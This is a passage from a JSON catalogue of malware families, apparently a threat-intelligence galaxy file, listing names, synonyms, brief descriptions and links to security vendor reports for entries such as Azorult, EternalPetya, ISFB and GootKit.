"https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/",
"https://blog.xpnsec.com/apt28-hospitality-malware-part-2/",
"https://www.proofpoint.com/us/threat-insight/post/apt28-racing-exploit-cve-2017-11292-flash-vulnerability-patches-are-deployed"
]
}
},
{
"uuid": "f8b91c34-b4f0-4ef2-b9fb-15bd5ec0a66d",
"value": "Lady",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://news.drweb.com/news/?i=10140&lng=en"
]
}
},
{
"uuid": "0dfbe48e-a3da-4265-975e-1eb37ad9c51c",
"value": "Azorult",
"description": "AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.",
"meta": {
"synonyms": [
"PuffStealer",
"Rultazo"
],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan",
"https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/",
"https://malwarebreakdown.com/2017/07/24/the-seamless-campaign-drops-ramnit-follow-up-malware-azorult-stealer-smoke-loader-etc/",
"http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html",
"https://blog.minerva-labs.com/puffstealer-evasion-in-a-cloak-of-multiple-layers"
]
}
},
{
"uuid": "35fd4bd7-d510-40fd-b89c-8a1b10dbc3f1",
"value": "HiKit",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.recordedfuture.com/hidden-lynx-analysis/",
"https://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware"
]
}
},
{
"uuid": "7fdb91ea-52dc-499c-81f9-3dd824e2caa0",
"value": "Moose",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.welivesecurity.com/2015/05/26/moose-router-worm/",
"http://gosecure.net/2016/11/02/exposing-the-ego-market-the-cybercrime-performed-by-the-linux-moose-botnet/",
"http://www.welivesecurity.com/2016/11/02/linuxmoose-still-breathing/"
]
}
},
{
"uuid": "1e722d81-085e-4beb-8901-aa27fe502dba",
"value": "Cannibal Rat",
"description": "Cannibal Rat is a python written remote access trojan with 4 versions as of March 2018. The RAT is reported to impact users of a Brazilian public sector management school. The RAT is distributed in a py2exe format, with the python27.dll and the python bytecode stored as a PE resource and the additional libraries zipped in the overlay of the executable.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.talosintelligence.com/2018/02/cannibalrat-targets-brazil.html"
]
}
},
{
"uuid": "e8d1a1f3-3170-4562-9a18-cadf000e48d0",
"value": "htpRAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.riskiq.com/blog/labs/htprat/"
]
}
},
{
"uuid": "c41e7fdd-f1b1-4b87-97d7-634202af8b61",
"value": "Orcus RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors",
"https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/",
"http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/",
"https://orcustechnologies.com/"
]
}
},
{
"uuid": "e5de818e-d25d-47a8-ab31-55fc992bf91b",
"value": "Dvmap",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/"
]
}
},
{
"uuid": "4f079a71-bb1b-47b6-a6d0-26a37cd8a3a6",
"value": "Syscon",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"http://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/"
]
}
},
{
"uuid": "5aed5403-9c52-4de6-9c8d-d29e5197ef7e",
"value": "Sarhust",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_sarhust.a"
]
}
},
{
"uuid": "13236f94-802b-4abc-aaa9-cb80cf4df9ed",
"value": "Zloader",
"description": "A banking trojan first observed in October 2016 has grown into a sophisticated hacking tool that works primarily as a banking trojan, but could also be used as an infostealer or backdoor.",
"meta": {
"synonyms": [
"Zeus Terdot"
],
"type": [],
"refs": [
"https://labs.bitdefender.com/2017/11/terdot-zeus-based-malware-strikes-back-with-a-blast-from-the-past/",
"https://www.arbornetworks.com/blog/asert/great-dga-sphinx/",
"https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/"
]
}
},
{
"uuid": "a936a595-f03d-4d8c-848e-2a3525c0415b",
"value": "Unidentified 023",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "dde61acb-8c0f-4a3a-8450-96e233f2ddc1",
"value": "mozart",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securitykitten.github.io/2015/01/11/the-mozart-ram-scraper.html"
]
}
},
{
"uuid": "52e0bcba-e352-4d7b-82ee-9169f18dca5a",
"value": "DeriaLock",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/struppigel/status/812601286088597505"
]
}
},
{
"uuid": "52d98d2f-db62-430d-8658-5cadaeff6cd7",
"value": "Korlia",
"description": "",
"meta": {
"synonyms": [
"bisonal"
],
"type": [],
"refs": [
"https://securitykitten.github.io/2014/11/25/curious-korlia.html",
"https://camal.coseinc.com/publish/2013Bisonal.pdf"
]
}
},
{
"uuid": "e1600d04-d2f7-4862-8bbc-0f038ea683ea",
"value": "TeleRAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/"
]
}
},
{
"uuid": "f371c85c-56f6-4ddf-8502-81866da4965b",
"value": "Pitou",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.tgsoft.it/english/news_archivio_eng.asp?id=884",
"https://www.f-secure.com/documents/996508/1030745/pitou_whitepaper.pdf"
]
}
},
{
"uuid": "e81f3e3f-966c-4c99-8d4b-fc0a1d3bb027",
"value": "KillDisk",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
"https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/"
]
}
},
{
"uuid": "686a9217-3978-47c0-9989-dd2a3438ba72",
"value": "Laziok",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector",
"https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=802"
]
}
},
{
"uuid": "35e00ff0-704e-4e61-b9bb-9ed20a4a008f",
"value": "BS2005",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://github.com/nccgroup/Royal_APT",
"https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
]
}
},
{
"uuid": "a13a2cb8-b0e6-483a-9916-f44969a2c42b",
"value": "Laoshu",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://objective-see.com/blog/blog_0x16.html",
"https://nakedsecurity.sophos.com/2014/01/21/data-stealing-malware-targets-mac-users-in-undelivered-courier-item-attack/"
]
}
},
{
"uuid": "6f736038-4f74-435b-8904-6870ee0e23ba",
"value": "EternalPetya",
"description": "",
"meta": {
"synonyms": [
"NonPetya",
"Diskcoder.C",
"NotPetya",
"Petna",
"Nyetya",
"BadRabbit",
"nPetya",
"ExPetr",
"Pnyetya"
],
"type": [],
"refs": [
"http://blog.talosintelligence.com/2017/10/bad-rabbit.html",
"https://securelist.com/from-blackenergy-to-expetr/78937/",
"https://www.washingtonpost.com/world/national-security/russian-military-was-behind-notpetya-cyberattack-in-ukraine-cia-concludes/2018/01/12/048d8506-f7ca-11e7-b34a-b85626af34ef_story.html",
"https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/",
"https://labsblog.f-secure.com/2017/06/30/eternal-petya-from-a-developers-perspective/",
"https://blog.comae.io/petya-2017-is-a-wiper-not-a-ransomware-9ea1d8961d3b",
"https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/",
"https://tisiphone.net/2017/06/28/why-notpetya-kept-me-awake-you-should-worry-too/",
"http://blog.erratasec.com/2017/06/nonpetya-no-evidence-it-was-smokescreen.html",
"https://www.crowdstrike.com/blog/petrwrap-technical-analysis-part-2-further-findings-and-potential-for-mbr-recovery/",
"http://www.intezer.com/notpetya-returns-bad-rabbit/",
"https://www.theguardian.com/technology/2017/jul/03/notpetya-malware-attacks-ukraine-warrant-retaliation-nato-researcher-tomas-minarik",
"https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-yet-another-stolen-piece-package/",
"https://www.riskiq.com/blog/labs/badrabbit/",
"https://labsblog.f-secure.com/2017/06/29/petya-i-want-to-believe/",
"http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html",
"https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/",
"https://www.wired.com/story/badrabbit-ransomware-notpetya-russia-ukraine/",
"https://www.crowdstrike.com/blog/fast-spreading-petrwrap-ransomware-attack-combines-eternalblue-exploit-credential-stealing/",
"https://threatpost.com/ukrainian-man-arrested-charged-in-notpetya-distribution/127391/",
"https://securelist.com/schroedingers-petya/78870/",
"https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/",
"https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/",
"https://www.bleepingcomputer.com/news/security/ransomware-attacks-continue-in-ukraine-with-mysterious-wannacry-clone/",
"https://www.gdatasoftware.com/blog/2017/07/29859-who-is-behind-petna",
"https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/eternalglue-part-one-rebuilding-notpetya-to-assess-real-world-resilience/",
"https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4",
"https://labsblog.f-secure.com/2017/10/27/the-big-difference-with-bad-rabbit/",
"https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/?utm_content=buffer8ffe4&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer",
"https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-lost-salsa20-key/",
"https://isc.sans.edu/forums/diary/Checking+out+the+new+Petya+variant/22562/",
"https://www.fireeye.com/blog/threat-research/2017/10/backswing-pulling-a-badrabbit-out-of-a-hat.html",
"https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-badrabbit-encryption-routine-specifics.html",
"https://securelist.com/bad-rabbit-ransomware/82851/"
]
}
},
{
"uuid": "5086a6e0-53b2-4d96-9eb3-a0237da2e591",
"value": "DarkComet",
"description": "",
"meta": {
"synonyms": [
"Fynloski",
"klovbot"
],
"type": [],
"refs": [
"https://darkcomet.net",
"https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/",
"http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html",
"https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/"
]
}
},
{
"uuid": "a171321e-4968-4ac0-8497-3250c1f0d77d",
"value": "ISFB",
"description": "2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked. This led to two main branches: one became known as Gozi Prinimalka, which was merge with Pony and became Vawtrak/Neverquest.\r\n\r\nThe other branch became known as Gozi ISFB, or ISFB in short. Webinject functionality was added to this version.\r\n\r\nThere is one panel which often was used in combination with ISFB: IAP. The panel's login page comes with the title 'Login - IAP'. The body contains 'AUTHORIZATION', 'Name:', 'Password:' and a single button 'Sign in' in a minimal design. Often, the panel is directly accessible by entering the C2 IP address in a browser. But there are ISFB versions which are not directly using IAP. The bot accesses a gate, which is called the 'Dreambot' gate. See win.dreambot for further information.\r\n\r\nISFB often was protected by Rovnix. This led to a further complication in the naming scheme - many companies started to call ISFB Rovnix. Because the signatures started to look for Rovnix, other trojans protected by Rovnix (in particular ReactorBot and Rerdom) sometimes got wrongly labelled.\r\n\r\nIn April 2016 a combination of Gozi ISFB and Nymaim was detected. This breed became known as GozNym. The merge uses a shellcode-like version of Gozi ISFB, that needs Nymaim to run. The C2 communication is performed by Nymaim.\r\n\r\nSee win.gozi for additional historical information.",
"meta": {
"synonyms": [
"Gozi ISFB",
"IAP",
"Pandemyia"
],
"type": [],
"refs": [
"https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb",
"https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html",
"https://lokalhost.pl/gozi_tree.txt",
"https://www.youtube.com/watch?v=jlc7Ahp8Iqg",
"https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245",
"https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/",
"http://blog.talosintelligence.com/2018/03/gozi-isfb-remains-active-in-2018.html",
"https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/",
"https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15",
"https://www.rsa.com/de-de/resources/pandemiya-emerges-new-malware-alternative-zeus-based",
"https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html"
]
}
},
{
"uuid": "ad960c5c-f2a1-405e-a32a-31f75b7c6859",
"value": "CMSBrute",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/the-shade-encryptor-a-double-threat/72087/"
]
}
},
{
"uuid": "54c8a055-a4be-4ec0-9943-ecad929e0dac",
"value": "Listrix",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
]
}
},
{
"uuid": "4c786624-4a55-46e6-849d-b65552034235",
"value": "Miuref",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "3e47c926-eea3-4fba-915a-1f3c5b92a94c",
"value": "Ransomlock",
"description": "",
"meta": {
"synonyms": [
"WinLock"
],
"type": [],
"refs": [
"https://forum.malekal.com/viewtopic.php?t=36485&start=",
"https://www.symantec.com/security_response/writeup.jsp?docid=2012-022215-2340-99&tabid=2"
]
}
},
{
"uuid": "e2325481-006f-4ad4-86d9-1a2ae6fea154",
"value": "pirpi",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/"
]
}
},
{
"uuid": "4cb8235a-7e70-4fad-9244-69215750d559",
"value": "Unidentified 045",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "77f2254c-9886-4eed-a7c3-bbcef4a97d46",
"value": "WireX",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://krebsonsecurity.com/2017/08/tech-firms-team-up-to-take-down-wirex-android-ddos-botnet/",
"https://www.flashpoint-intel.com/blog/wirex-botnet-industry-collaboration/"
]
}
},
{
"uuid": "1f4d8d42-8f31-47f8-b2b7-2d43196de532",
"value": "Slave",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cert.pl/en/news/single/slave-banatrix-and-ransomware/"
]
}
},
{
"uuid": "93b27a50-f9b7-4ab6-bb9f-70a4b914eec3",
"value": "TinyZ",
"description": "",
"meta": {
"synonyms": [
"Catelites Android Bot",
"MarsElite Android Bot"
],
"type": [],
"refs": [
"http://blog.group-ib.com/cron"
]
}
},
{
"uuid": "daddd1dc-c415-4970-89ee-526ee8de2ec1",
"value": "RGDoor",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/",
"https://researchcenter.paloaltonetworks.com/2017/09/unit42-striking-oil-closer-look-adversary-infrastructure/"
]
}
},
{
"uuid": "7f550cae-98b7-4a0c-bed2-d79227dc6310",
"value": "Citadel",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.xylibox.com/2016/02/citadel-0011-atmos.html",
"http://blog.jpcert.or.jp/2016/02/banking-trojan--27d6.html",
"https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/",
"https://www.arbornetworks.com/blog/asert/the-citadel-and-gameover-campaigns-of-5cb682c10440b2ebaf9f28c1fe438468/"
]
}
},
{
"uuid": "9a3d71b1-ce2f-4506-85c1-ec661b8f4032",
"value": "DualToy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/"
]
}
},
{
"uuid": "192f93bc-fcf6-4aaf-ae2f-d9435a67e48b",
"value": "Magala",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/the-magala-trojan-clicker-a-hidden-advertising-threat/78920/"
]
}
},
{
"uuid": "53089817-6d65-4802-a7d2-5ccc3d919b74",
"value": "X-Tunnel",
"description": "",
"meta": {
"synonyms": [
"xaps"
],
"type": [],
"refs": [
"https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/",
"https://www.root9b.com/sites/default/files/whitepapers/root9b_follow_up_report_apt28.pdf",
"https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/",
"http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf",
"https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
"https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/",
"http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_English.pdf",
"https://www.root9b.com/sites/default/files/whitepapers/R9b_FSOFACY_0.pdf"
]
}
},
{
"uuid": "30d49b12-0dca-4652-9f7a-4d0cf7555375",
"value": "OvidiyStealer",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/meet-ovidiy-stealer-bringing-credential-theft-masses"
]
}
},
{
"uuid": "48deadcc-1a67-442d-b181-fdaaa337c4bb",
"value": "Trump Ransom",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "34e9d701-22a1-4315-891d-443edd077abf",
"value": "SpyBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "77e85a95-6a78-4255-915a-488eb73ee82f",
"value": "CockBlocker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/JaromirHorejsi/status/817311664391524352"
]
}
},
{
"uuid": "b7240444-94a6-4d57-a6b3-ca38182eff7a",
"value": "Cryptorium",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/struppigel/status/810770490491043840"
]
}
},
{
"uuid": "c84a6b0b-28a5-4293-b8fc-6a6eeb7b5f70",
"value": "Ayegent",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "5b3af4f0-7502-4125-bf63-b393cf185a52",
"value": "FlexiSpy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/"
]
}
},
{
"uuid": "43a56ed7-8092-4b36-998c-349b02b3bd0d",
"value": "PLEAD",
"description": "",
"meta": {
"synonyms": [
"TSCookie"
],
"type": [],
"refs": [
"https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
"https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html",
"http://www.freebuf.com/column/159865.html",
"http://blog.jpcert.or.jp/2018/03/malware-tscooki-7aa0.html",
"https://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf"
]
}
},
{
"uuid": "cf752563-ad8a-4286-b2b3-9acf24a0a09a",
"value": "Sality",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf"
]
}
},
{
"uuid": "329efac7-922e-4d8b-90a9-4a87c3281753",
"value": "GootKit",
"description": "Gootkit is a banking trojan, where large parts are written in javascript (node.JS). It jumps to C/C++-library functions for various tasks.",
"meta": {
"synonyms": [
"Xswkit"
],
"type": [],
"refs": [
"https://www.lexsi.com/securityhub/homer-simpson-brian-krebs-rencontrent-zeus-gootkit/",
"http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3669",
"https://securityintelligence.com/gootkit-developers-dress-it-up-with-web-traffic-proxy/",
"https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/",
"https://www.us-cert.gov/ncas/alerts/TA16-336A",
"https://securityintelligence.com/gootkit-bobbing-and-weaving-to-avoid-prying-eyes/",
"https://www.youtube.com/watch?v=242Tn0IL2jE",
"http://blog.cert.societegenerale.com/2015/04/analyzing-gootkits-persistence-mechanism.html",
"https://www.s21sec.com/en/blog/2016/05/reverse-engineering-gootkit/",
"http://blog.trendmicro.com/trendlabs-security-intelligence/fake-judicial-spam-leads-to-backdoor-with-fake-certificate-authority/",
"http://www.vkremez.com/2018/04/lets-learn-in-depth-dive-into-gootkit.html",
"https://news.drweb.com/show/?i=4338&lng=en",
"https://www.cyphort.com/angler-ek-leads-to-fileless-gootkit/",
"https://www.youtube.com/watch?v=QgUlPvEE4aw",
"https://forums.juniper.net/t5/Security-Now/New-Gootkit-Banking-Trojan-variant-pushes-the-limits-on-evasive/ba-p/319055"
]
}
},
{
"uuid": "294bb6f0-0610-47e6-a4e7-71e40cf69908",
"value": "Cpuminer",
"description": "This was observed to be pushed by IoT malware, abusing devices for LiteCoin and BitCoin mining.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://github.com/pooler/cpuminer"
]
}
},
{
"uuid": "a85b0619-ed8e-4324-8603-af211d682dac",
"value": "Ripper ATM",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.trendmicro.com/trendlabs-security-intelligence/untangling-ripper-atm-malware/"
]
}
},
{
"uuid": "d1f8af3c-719b-4f64-961b-8d89a2defa02",
"value": "MacInstaller",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://objective-see.com/blog/blog_0x16.html"
]
}
},
{
"uuid": "700366d8-4036-4e48-9a5f-bd6e09fb9b6b",
"value": "Chapro",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html",
"http://blog.eset.com/2012/12/18/malicious-apache-module-used-for-content-injection-linuxchapro-a"
]
}
},
{
"uuid": "3d3da4c0-004c-400c-9da6-f83fd35d907e",
"value": "Cardinal RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412"
]
}
},
{
"uuid": "f0ff8751-c182-4e9c-a275-81bb03e0cdf5",
"value": "BrickerBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/",
"https://www.bleepingcomputer.com/news/security/brickerbot-author-claims-he-bricked-two-million-devices/",
"https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf",
"https://www.trustwave.com/Resources/SpiderLabs-Blog/BrickerBot-mod_plaintext-Analysis/",
"https://www.bleepingcomputer.com/news/security/brickerbot-author-retires-claiming-to-have-bricked-over-10-million-iot-devices/",
"http://depastedihrn3jtw.onion/show.php?md5=2c822a990ff22d56f3b9eb89ed722c3f",
"https://ics-cert.us-cert.gov/alerts/ICS-ALERT-17-102-01A",
"http://seclists.org/fulldisclosure/2017/Mar/7"
]
}
},
{
"uuid": "54cd671e-b7e4-4dd3-9bfa-dc0ba5105944",
"value": "ManameCrypt",
"description": "",
"meta": {
"synonyms": [
"CryptoHost"
],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/cryptohost-decrypted-locks-files-in-a-password-protected-rar-file/",
"https://www.gdatasoftware.com/blog/2016/04/28234-manamecrypt-a-ransomware-that-takes-a-different-route"
]
}
},
{
"uuid": "e3e90666-bc19-4741-aca8-1e4cbc2f4c9e",
"value": "Switcher",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/blog/mobile/76969/switcher-android-joins-the-attack-the-router-club/"
]
}
},
{
"uuid": "cbf9ff89-d35b-4954-8873-32f59f5e4d7d",
"value": "Dummy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://objective-see.com/blog/blog_0x32.html"
]
}
},
{
"uuid": "18da6a0e-abe9-4f65-91a3-2bf5a5ad29c2",
"value": "Unidentified 047",
"description": "RAT written in Delphi used by Patchwork APT.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/"
]
}
},
{
"uuid": "53616ce4-9b8e-45a0-b380-9e778cd95ae2",
"value": "Infy",
"description": "",
"meta": {
"synonyms": [
"Foudre"
],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/",
"https://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/",
"https://github.com/pan-unit42/iocs/blob/master/prince_of_persia/hashes.csv",
"https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/"
]
}
},
{
"uuid": "4350b52a-8100-49b5-848d-d4a4029e949d",
"value": "Bunitu",
"description": "Bunitu is a trojan that exposes infected computers to be used as a proxy for remote clients. It registers itself at startup by providing its address and open ports. Access to Bunitu proxies is available by using criminal VPN services (e.g.VIP72).",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://zerophagemalware.com/2017/06/07/rig-ek-via-fake-eve-online-website-drops-bunitu/",
"http://malware-traffic-analysis.net/2017/05/09/index.html",
"https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/",
"https://blog.malwarebytes.com/threat-analysis/2015/08/whos-behind-your-proxy-uncovering-bunitus-secrets/"
]
}
},
{
"uuid": "bbbef449-2fe6-4c25-a85c-69af9fa6208b",
"value": "Joanap",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.us-cert.gov/ncas/alerts/TA18-149A",
"https://www.us-cert.gov/ncas/analysis-reports/AR18-149A",
"https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/"
]
}
},
{
"uuid": "dcc0fad2-29a9-4b69-9d75-d288ca458bc7",
"value": "witchcoven",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www2.fireeye.com/rs/848-DID-242/images/rpt-witchcoven.pdf"
]
}
},
{
"uuid": "579cc23d-4ba4-419f-bf8a-f235ed33125e",
"value": "Coreshell",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
"http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf",
"http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware.html",
"http://malware.prevenity.com/2014/08/malware-info.html"
]
}
},
{
"uuid": "467c726e-6e19-4d15-88b6-362cbe0b3d20",
"value": "SnatchLoader",
"description": "A downloader trojan with some infostealer capabilities focused on the browser. Previously observed as part of RigEK campaigns.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://zerophagemalware.com/2017/12/11/malware-snatch-loader-reloaded/",
"https://twitter.com/VK_Intel/status/898549340121288704",
"https://www.arbornetworks.com/blog/asert/snatchloader-reloaded/",
"https://myonlinesecurity.co.uk/your-order-no-8194788-has-been-processed-malspam-delivers-malware/"
]
}
},
{
"uuid": "15dd8386-f11a-485a-b719-440c0a47dee6",
"value": "SHAPESHIFT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html"
]
}
},
{
"uuid": "d7e31f19-8bf2-4def-8761-6c5bf7feaa44",
"value": "Proton RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cybereason.com/labs-blog/labs-proton-b-what-this-mac-malware-actually-does",
"https://blog.malwarebytes.com/threat-analysis/mac-threat-analysis/2017/11/osx-proton-spreading-through-fake-symantec-blog/",
"https://objective-see.com/blog/blog_0x1D.html",
